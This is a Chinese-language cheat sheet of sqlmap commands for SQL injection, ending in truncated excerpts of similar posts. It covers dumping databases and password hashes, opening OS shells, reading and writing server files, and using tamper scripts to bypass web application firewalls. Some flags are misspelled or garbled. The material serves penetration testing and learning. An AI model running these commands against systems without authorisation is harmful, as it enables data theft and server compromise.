一、sqlmap常用基礎命令
sqlmap common operation command
以下命令順序即為sql注入常見步驟。
sqlmap -u url --dbs #獲取資料庫1、如果是microsoft access 可省略前三個步驟 且不需要-d引數sqlmap -u url --current-user #獲取當前使用者名稱 :
sqlmap -u url --current-db #獲取當前資料庫名稱
sqlmap -u url -d 資料庫名 --tables #列出表名 :
sqlmap -u url -d 資料庫名 -t 表名 --columns #列出字段
sqlmap -u url -d 資料庫名 -t 表名 -c 欄位名1,欄位名2,…… --dump #獲取字段內容
2、獲取字段內容時可以省略字段資訊直接查詢所有字段 使用:
sqlmap -u url -d 資料庫名 -t 表名 --dump
--cookie=cookie的內容 設定cookie 值 通常配合獲取資料庫使用get型注入一般用 sqlmap -u url--data 設定 post 提交的值
-u 指定目標 url
-b 獲取 dbms banner
--current-db 獲取當前資料庫
--current-user 獲取當前資料庫的使用者
--tables 獲取資料庫裡所有的表名
--columns 獲取表裡的所有字段
--dump 獲取欄位中的內容
--current-user 獲取當前使用者
-d [資料庫名] 指定資料庫名
-t [表名] 指定表名
-c [欄位名] 指定欄位名
--string 當查詢可用時用來匹配頁面中的字串
--users 列舉所有使用者
--passwords 列舉所有使用者的密碼hsah
--dbs 列舉資料庫中的資料庫名
-r 指定請求包
post型注入一般用 sqlmap -u url --data post引數
如果需要增加cookie或其他請求頭 可將請求儲存到文字中,如request.txt,則用sqlmap -r request.txt(經常配合burpsuite使用,直接將請求包儲存到檔案,然後使用sqlmap -r 來進行sql注入)
二、sqlmap常用基礎命令
--level 5 探測等級(1~5 預設為1,等級越高payload越多,速度也比較慢)--fresh-queries 重新整理快取,避免後續查詢資料不更新
--techque=u 使用聯合查詢,b 布林查詢…… 通常能用u就用u 很快
--random-agent 使用隨機ua
--is-dba 判斷當前使用者是否是管理員許可權
--roles 列出資料庫管理員角色(僅適用與oracle資料庫)
--referer http referer頭(偽造http頭中的referer,當--level等級大於等於3時會通過偽造referer來進行注入)
--sql-shell 執行自定義sql語句 用法:sqlmap -u url --sql-shell
--os-cmd,--os-shell 執行任意作業系統命令(僅支援mysql、postgresql、sql server)
--file-read 從資料庫伺服器中讀取檔案(要知道檔案絕對路徑)
--file-write "本地檔案路徑" --file-dest "遠端絕對路徑" 上傳檔案到資料庫伺服器中
--tamper "模組名" bypass繞waf時使用 具體模組可參考書《web安全攻防 滲透測試實戰指南》p40~49頁
sqlmap基本操作命令
1.獲取資料庫相關資訊 python sqlmap.py u url 2.獲取資料庫內資訊,獲取資料庫內所有資料庫的名稱 python sqlmap.py u url dbs 3.獲取某個資料庫中表的資訊 python sqlmap.py u url d mys tables 4.獲取某個表內列的資...
sqlmap常用命令
1.找到注入點url 2.sqlmap u url v 1 dbs 列出資料庫 或者 sqlmap u url v 1 current db 顯示當前資料庫 3.sqlmap u url v 1 users 列出資料庫使用者 current user當前資料庫使用者 4.sqlmap u url v...
SqlMap常用命令
sqlmap是我們常用的一款sql注入漏洞檢測工具,為了方便大家平時的使用,在此分享一下我總結的一下命令。目錄結構 extra 額外功能 lib 連線庫,注入引數,提權操作 tamper 繞過指令碼 thirdparty 第三方外掛程式 txt 字典,例如瀏覽器 表,列,關鍵字 udf 自定義攻擊載...